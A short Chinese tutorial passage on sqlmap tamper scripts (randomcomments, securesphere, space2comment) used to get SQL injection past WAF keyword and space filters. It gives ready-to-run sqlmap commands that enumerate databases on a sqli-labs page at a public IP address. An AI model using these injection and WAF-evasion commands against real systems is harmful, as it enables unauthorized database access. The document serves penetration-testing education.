sqlmap从入门到精通-第七章-7-17 绕过WAF脚本-randomcomments.py&space2comment.py

35. randomcomments.py脚本

在payload关键字中随机插入/**/,可以绕过关键字过滤,适用于所有数据库

实战演示:

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="randomcomments.py" --proxy="http://127.0.0.1:8080" -batch

 并未注入成功,看看burp抓包的效果

效果已经有了针对关键的payload增加/**/

=====================================================================================================================================

36. securesphere.py脚本

添加经过特殊构造的字符串,在payload后面加入字符串,据说是可以自定义的,适用于所有数据库

实战演示:

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="securesphere.py" --proxy="http://127.0.0.1:8080" -batch

新版本的sqlmap已经不存在这个

====================================================================================================================================

37. space2comment.py脚本

使用/**/替换空格符,主要用于空格的绕过

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2comment.py" --proxy="http://127.0.0.1:8080" -batch

发现是可以注入的,看看burp抓包情况

迷茫的人生,需要不断努力,才能看清远方模糊的志向!
原文地址:https://www.cnblogs.com/autopwn/p/13570183.html